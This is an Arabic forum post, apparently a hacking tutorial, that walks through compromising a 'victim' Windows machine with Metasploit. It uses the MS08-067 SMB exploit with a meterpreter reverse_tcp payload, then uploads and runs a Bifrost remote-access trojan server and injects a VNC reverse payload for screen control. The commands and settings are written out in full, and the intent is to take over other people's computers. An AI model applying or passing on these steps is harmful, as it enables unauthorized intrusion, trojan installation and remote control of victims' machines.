محمد الهجني
(( افـعـى الـهـكـر الـــجـــديــد ))
من الذي دعاك : مكافحه المواقع الاباحيه
 
الابراج :  عدد الرسائل : 6
تاريخ الميلاد : 11/07/1992
الموقع : www.ejdabya.malware-site.www
البلد / المحافظة : ليبيا/طرابلس/جنزور
 نقاط واوسمة : 16
تاريخ التسجيل : 25/12/2012
 | موضوع: محمد الهجني:طريقة اختراق جهاز الضحية بالميتا ورفع سيرفر بيفروست  الثلاثاء ديسمبر 25, 2012 11:07 am | |
|
السلام عليكم
طريقة اختراق جهاز الضحية بالميتا ورفع سيرفر بيفروست
وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
تم تطبيق الشرح على جهاز افتراضي
الشرح
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 808x434.
إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits
ونختار windows/smb/ms08_067_netapi
show payloads
ونختار windows/meterpreter/reverse_tcp
أو نختارها مباشرة كما ف الصورة
والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 800x600.
كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445
**************************************************
لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح
لتشغيل السيرفر start server.exe
*******************************************
وكما توضح الصورة نجاح تحميل السيرفر
والصور تعبر عن نفسها
لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp
بتطبيق الثغرة ستفتح لنا الشاشة التالية
الرجاء الدعاء لوالدى + التقيم
| |
|
